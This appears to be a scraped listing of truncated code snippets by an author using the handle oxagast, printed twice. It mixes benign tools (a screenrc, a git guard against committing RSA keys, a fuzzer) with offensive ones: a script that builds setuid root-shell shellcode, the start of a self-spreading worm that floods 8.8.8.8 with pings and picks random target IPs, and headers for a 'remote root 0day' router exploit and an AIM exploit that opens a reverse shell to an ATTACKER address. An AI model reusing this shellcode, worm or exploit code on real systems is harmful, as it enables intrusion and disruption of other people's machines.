Mark Stealer Whitehall oxagast

## nosecandy.c
#include "stdio.h"
#include "string.h"
void test_op(unsigned char was, unsigned char expected) {
  printf("%c", was);
}
int main(int argc, char *argv[]) {
  if ((argc > 1) && (argc < 3)) {
    char ui[10];
    for (int uia=0; uia<6; uia++) {
      ui[uia] = argv[1][uia];

## magicsquare.cpp
//    __ _  _  __   ___  __  ____ ____
//   /  ( \/ )/ _\ / __)/ _\/ ___(_  _)
//  (  O )  (/    ( (_ /    \___ \ )(
//   \__(_/\_\_/\_/\___\_/\_(____/(__)
// magic square

#include <algorithm>
#include <cstdlib>
#include <cstring>
#include <iostream>

## mac2hw.sh
rm page_part 2>/dev/null;
arp | sed -e 's/.*ether[[:space:]]*//' -e 's/   C.*//' | grep : | xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} | grep Vendor -A 1 | grep google > page_part;
cat page_part | cut -d '=' -f 5 | cut -d '"' -f 1 > macs_resolved && arp -n | arp -n | cut -f 1 -d ' ' > ips_tomac;
tail -n $(echo `cat ips_tomac | wc -l`-1 | bc) ips_tomac > ips_tomac2;
cat ips_tomac2 -n | tee resolved && cat macs_resolved -n | tee -a resolved;
rm ips_tomac ips_tomac2 macs_resolved page_part

## godmode.sh
### godmode by oxagast ###
echo '#include <unistd.h>' > sc.c;
echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c;
gcc sc.c -o godmode;
SHELLCODE=$(objdump --show-raw-insn -d godmode | grep -v "file format" |  cut -f 2 -d ':' | cut -c -21 | cut -c 2- | sed -e 's/ /\n/g' | grep -v "^$" | sed -e 's/^/\\x/' | tr -d "\n")
echo -n "char shellcode[] =  "
echo $SHELLCODE | sed -e 's/\(.\{60\}\)/\1\n/' | head -n 1 > s.tmp; echo $SHELLCODE | sed -e 's/^\n//' | sed -e 's/\(.\{80\}\)/\1\n/g' | sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp | sed -e 's/^\\/"\\/' -e 's/$/\"/' | head -c -1
echo ";";
rm sc.c godmode;

## git_check_rsa.sh
#!/bin/bash
# alias "git"='~/.git_check_rsa.sh'
if [ "$(find . -type f 2>/dev/null | xargs head -n 1 2>/dev/null | grep 'BEGIN RSA' | head -n 1 2>/dev/null)" == "-----BEGIN RSA PRIVATE KEY-----" ]; then
echo RSA KEY FOUND!;
echo Not adding to git.;
exit 1;
else
git $@
fi

## .screenrc
startup_message off
#idle 1800 lockscreen
vbell off
msgwait 2
defscrollback 15000
defutf8 on
shell bash
shelltitle "$ |bash"
bind '/' eval "clear" "scrollback 0" "scrollback 15000"
bind = resize =

## worts.sh
#!/bin/bash
dnf install tor torsocks expect -y; apt-get install tor torsocks expect build-essential -y; systemctl start tor &
werm=$(cat $0 | base64 -w 0);
pound='8.8.8.8';
while [ 1 ];
do
ip_address=$(dd if=/dev/urandom bs=4 count=1 2>/dev/null | od -An -tu1 | sed -e 's/^ *//' -e 's/  */./g')
ping $pound -f -c 10000 &
wget $pound &
servers_addresses=( $ip_address )

## bermise_fuzz.sh
# bermise_fuzz
# oxagast

mupr="64";

syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c);
binname="$1";
binshort=$(echo $binname | awk -F "/" '{print $NF}')
echo fuzzing $binname;
randchars=1;

## pk5001z00pin.c
/*  PK5001Z CenturyLink Router/Modem remote root exploit                  */
/*             oxagast / Marshall Whittaker                               */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin                     */
/* PK5001Z CenturyLink Router remote root 0day                            */
/* Enjoy!                                                                 */
/*   --oxagast                                                            */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1         */
/*                                                                        */
/* # uname -a; id;                                                        */

## aim_8.0.1.5_reverse.sh
#!/bin/bash

### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

### Marshall Whittaker

ATTACKER="192.168.2.10";
	#include "stdio.h"
	#include "string.h"
	void test_op(unsigned char was, unsigned char expected) {
	printf("%c", was);
	}
	int main(int argc, char *argv[]) {
	if ((argc > 1) && (argc < 3)) {
	char ui[10];
	for (int uia=0; uia<6; uia++) {
	ui[uia] = argv[1][uia];
	// __ _ _ __ ___ __ ____ ____
	// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
	// ( O ) (/ ( (_ / \___ \ )(
	// \__(_/\_\_/\_/\___\_/\_(____/(__)
	// magic square

	#include <algorithm>
	#include <cstdlib>
	#include <cstring>
	#include <iostream>
	rm page_part 2>/dev/null;
	arp \| sed -e 's/.ether[[:space:]]//' -e 's/ C.*//' \| grep : \| xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} \| grep Vendor -A 1 \| grep google > page_part;
	cat page_part \| cut -d '=' -f 5 \| cut -d '"' -f 1 > macs_resolved && arp -n \| arp -n \| cut -f 1 -d ' ' > ips_tomac;
	tail -n $(echo `cat ips_tomac \| wc -l`-1 \| bc) ips_tomac > ips_tomac2;
	cat ips_tomac2 -n \| tee resolved && cat macs_resolved -n \| tee -a resolved;
	rm ips_tomac ips_tomac2 macs_resolved page_part
	### godmode by oxagast ###
	echo '#include <unistd.h>' > sc.c;
	echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c;
	gcc sc.c -o godmode;
	SHELLCODE=$(objdump --show-raw-insn -d godmode \| grep -v "file format" \| cut -f 2 -d ':' \| cut -c -21 \| cut -c 2- \| sed -e 's/ /\n/g' \| grep -v "^$" \| sed -e 's/^/\\x/' \| tr -d "\n")
	echo -n "char shellcode[] = "
	echo $SHELLCODE \| sed -e 's/\(.\{60\}\)/\1\n/' \| head -n 1 > s.tmp; echo $SHELLCODE \| sed -e 's/^\n//' \| sed -e 's/\(.\{80\}\)/\1\n/g' \| sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp \| sed -e 's/^\\/"\\/' -e 's/$/\"/' \| head -c -1
	echo ";";
	rm sc.c godmode;
	#!/bin/bash
	# alias "git"='~/.git_check_rsa.sh'
	if [ "$(find . -type f 2>/dev/null \| xargs head -n 1 2>/dev/null \| grep 'BEGIN RSA' \| head -n 1 2>/dev/null)" == "-----BEGIN RSA PRIVATE KEY-----" ]; then
	echo RSA KEY FOUND!;
	echo Not adding to git.;
	exit 1;
	else
	git $@
	fi
	startup_message off
	#idle 1800 lockscreen
	vbell off
	msgwait 2
	defscrollback 15000
	defutf8 on
	shell bash
	shelltitle "$ \|bash"
	bind '/' eval "clear" "scrollback 0" "scrollback 15000"
	bind = resize =
	#!/bin/bash
	dnf install tor torsocks expect -y; apt-get install tor torsocks expect build-essential -y; systemctl start tor &
	werm=$(cat $0 \| base64 -w 0);
	pound='8.8.8.8';
	while [ 1 ];
	do
	ip_address=$(dd if=/dev/urandom bs=4 count=1 2>/dev/null \| od -An -tu1 \| sed -e 's/^ //' -e 's/ /./g')
	ping $pound -f -c 10000 &
	wget $pound &
	servers_addresses=( $ip_address )
	# bermise_fuzz
	# oxagast

	mupr="64";

	syslog_crashes=$(grep "traps:\\|segfault" /var/log/syslog -c);
	binname="$1";
	binshort=$(echo $binname \| awk -F "/" '{print $NF}')
	echo fuzzing $binname;
	randchars=1;
	/* PK5001Z CenturyLink Router/Modem remote root exploit */
	/* oxagast / Marshall Whittaker */
	/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
	/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
	/* PK5001Z CenturyLink Router remote root 0day */
	/* Enjoy! */
	/* --oxagast */
	/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
	/* */
	/* # uname -a; id; */
	#!/bin/bash

	### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
	### Leverages binary file planting to My Documents via AIMs advertisement code.
	### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
	### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

	### Marshall Whittaker

	ATTACKER="192.168.2.10";